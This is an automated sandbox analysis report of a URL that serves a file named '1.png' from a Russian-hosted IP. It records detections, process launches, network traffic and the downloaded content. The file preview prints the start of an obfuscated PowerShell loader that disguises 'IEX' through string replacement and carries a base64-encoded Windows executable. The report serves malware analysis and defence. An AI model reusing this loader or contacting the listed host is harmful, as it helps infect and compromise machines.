Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://176.113.115.170/1/1.png

Overview

General Information

Sample URL:http://176.113.115.170/1/1.png
Analysis ID:1591584
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
AI detected suspicious URL
Detected non-DNS traffic on DNS port

Classification

  • System is w10x64
  • chrome.exe (PID: 1184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,8290938430860116093,8568642415995171343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://176.113.115.170/1/1.png" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://176.113.115.170/1/1.pngAvira URL Cloud: detection malicious, Label: malware

Phishing

barindex
Source: URLJoe Sandbox AI: AI detected IP in URL: http://176.113.115.170
Source: http://176.113.115.170/1/1.pngHTTP Parser: No favicon
Source: global trafficTCP traffic: 192.168.2.4:62017 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
Source: global trafficHTTP traffic detected: GET /1/1.png HTTP/1.1Host: 176.113.115.170Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 176.113.115.170Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://176.113.115.170/1/1.pngAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Wed, 15 Jan 2025 04:44:53 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 62078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: classification engineClassification label: mal52.win@16/4@2/4
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,8290938430860116093,8568642415995171343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://176.113.115.170/1/1.png"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,8290938430860116093,8568642415995171343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://176.113.115.170/1/1.png100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://176.113.115.170/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
216.58.206.68
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    http://176.113.115.170/favicon.icotrue
    • Avira URL Cloud: safe
    unknown
    http://176.113.115.170/1/1.pngtrue
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      239.255.255.250
      unknownReserved
      unknownunknownfalse
      176.113.115.170
      unknownRussian Federation
      49505SELECTELRUtrue
      216.58.206.68
      www.google.comUnited States
      15169GOOGLEUSfalse
      IP
      192.168.2.4
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1591584
      Start date and time:2025-01-15 05:43:52 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 53s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:browseurl.jbs
      Sample URL:http://176.113.115.170/1/1.png
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:8
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal52.win@16/4@2/4
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 142.250.186.67, 142.250.185.78, 173.194.76.84, 216.58.206.46, 142.250.186.174, 142.250.184.206, 142.250.81.238, 74.125.0.102, 199.232.210.172, 2.23.77.188, 142.250.184.227, 2.23.242.162, 4.175.87.197, 13.107.246.45
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, r1.sn-t0aekn7e.gvt1.com, clients.l.google.com, r1---sn-t0aekn7e.gvt1.com
      • Not all processes where analyzed, report is missing behavior information
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • VT rate limit hit for: http://176.113.115.170/1/1.png
      No simulations
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (65483), with CRLF line terminators
      Category:downloaded
      Size (bytes):122750
      Entropy (8bit):4.974501542694698
      Encrypted:false
      SSDEEP:3072:cXkYzSm2MYra1Qdgzkqs5u0uXrRMnfB3sBVy8ZK5HKceYWQLJgvF/9EoQ6GsbwMK:kkYzSm2MYa1Qdgzkqs5u0uXrRMnfB3sO
      MD5:5F3064DFF92454163B8480670DC865AC
      SHA1:510D4D81FFAA61B9BE598CA5B8668E419B0D34EA
      SHA-256:6859AF5F9EE469FD020454A4A9DE4D389D5CC3F160EC277AE38B390C5C4CB4AE
      SHA-512:832802FE78E0DBF946D241632F4DBA67A019D69DF913C8DAFEBD6D5F2347EEA3EDDC77D41EFF1CCA0061750D4DC7BCAEDDAAB97F021FAF872230BF8E91528434
      Malicious:false
      Reputation:low
      URL:http://176.113.115.170/1/1.png
      Preview:.. $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAblsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABRbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABQWwEAAAAAAEgAAAACAAUA6KAAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBBAAAAAQAAESjuAAAGIFE2Eswgz+dzkGElChleRQMAAADg////AgAAABsAAAArGSi5AgAGKKECAAYGIP8SVLxaIMAE8CNhK8oqAAAAEzAKAF4BAAACAAARIPIYfXkoAQAAKwoobAIABihlAQAGCyC/
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, ASCII text, with CRLF line terminators
      Category:downloaded
      Size (bytes):1245
      Entropy (8bit):5.462849750105637
      Encrypted:false
      SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
      MD5:5343C1A8B203C162A3BF3870D9F50FD4
      SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
      SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
      SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
      Malicious:false
      Reputation:low
      URL:http://176.113.115.170/favicon.ico
      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
      No static file info
      TimestampSource PortDest PortSource IPDest IP
      Jan 15, 2025 05:44:38.627387047 CET49675443192.168.2.4173.222.162.32
      Jan 15, 2025 05:44:48.234956980 CET49675443192.168.2.4173.222.162.32
      Jan 15, 2025 05:44:50.948245049 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:44:50.948271036 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:44:50.948352098 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:44:50.948599100 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:44:50.948613882 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:44:51.594280958 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:44:51.594749928 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:44:51.594783068 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:44:51.595736980 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:44:51.595819950 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:44:51.596863031 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:44:51.596923113 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:44:51.641787052 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:44:51.641808033 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:44:51.688625097 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:44:52.421895981 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:52.422235012 CET4974280192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:52.427218914 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:52.427278996 CET8049742176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:52.427309990 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:52.427453041 CET4974280192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:52.478908062 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:52.484194994 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130054951 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130126953 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130170107 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130208015 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130214930 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.130244970 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130280018 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130309105 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.130317926 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130351067 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.130356073 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130393028 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130404949 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.130429983 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.130611897 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.136672974 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.136710882 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.136748075 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.136806011 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.177783966 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.250746012 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.250797033 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.250835896 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.250871897 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.250902891 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.250931025 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.250950098 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.250968933 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.251008987 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.251040936 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.251574993 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.251626015 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.251642942 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.251665115 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.251703978 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.251729012 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.252249002 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252300978 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252337933 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252340078 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.252374887 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252384901 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.252414942 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252463102 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.252871990 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252907991 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252944946 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252979994 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.252995968 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.253019094 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.253043890 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.253745079 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.253806114 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.341346979 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.371485949 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.371531010 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.371584892 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.371592045 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.371629000 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.371661901 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.371668100 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.371702909 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.371716022 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.371742010 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.371941090 CET4974180192.168.2.4176.113.115.170
